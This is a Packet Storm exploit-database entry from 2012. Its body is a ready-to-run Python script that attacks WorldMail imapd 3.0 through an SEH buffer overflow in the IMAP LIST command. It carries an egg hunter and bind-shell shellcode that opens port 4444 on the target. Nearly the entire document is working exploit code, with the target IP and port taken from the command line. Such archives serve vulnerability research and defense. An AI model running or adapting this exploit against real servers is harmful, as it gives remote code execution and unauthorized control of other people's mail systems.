WorldMail imapd 3.0 SEH Overflow

2012-01-13T00:00:00
ID PACKETSTORM:108625
Type packetstorm
Reporter TheXero
Modified 2012-01-13T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
import sys  
import socket  
  
## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)  
## Tested on: XP SP3 en-us  
## Author: TheXero  
## Website: www.thexero.co.uk  
## http://www.nullsecurity.net  
  
## Check for parameters  
if len(sys.argv) != 3:  
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"  
quit()  
  
## Assigns the parameters  
target = sys.argv[1]  
port = int(sys.argv[2])  
  
## Sets up the socket  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
## Sets the variables  
char = "}"  
nseh = "\xeb\x06\x90\x90"  
seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll  
buffer = '\x90' * 8  
shellcode = ("T00WT00W" ## Bindshell port 4444  
"\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"  
"\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"  
"\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"  
"\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"  
"\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"  
"\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"  
"\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"  
"\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"  
"\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"  
"\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"  
"\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"  
"\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"  
"\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"  
"\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"  
"\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"  
"\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"  
"\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"  
"\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"  
"\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"  
"\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"  
"\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"  
"\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"  
"\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"  
"\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"  
"\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")  
  
## Calculates the size of junk depending on the shellcode  
junk = "\x41" * (769 - len(shellcode))  
  
## Egg Hunter  
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"  
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")  
  
## Assembles the buffer  
buffer = char + junk + shellcode + nseh + seh + hunter + char  
  
## Connects  
s.connect((target,port))  
data=s.recv(1024)  
s.send("a001 LIST " + buffer + "\r\n")  
s.close()  
  
  
`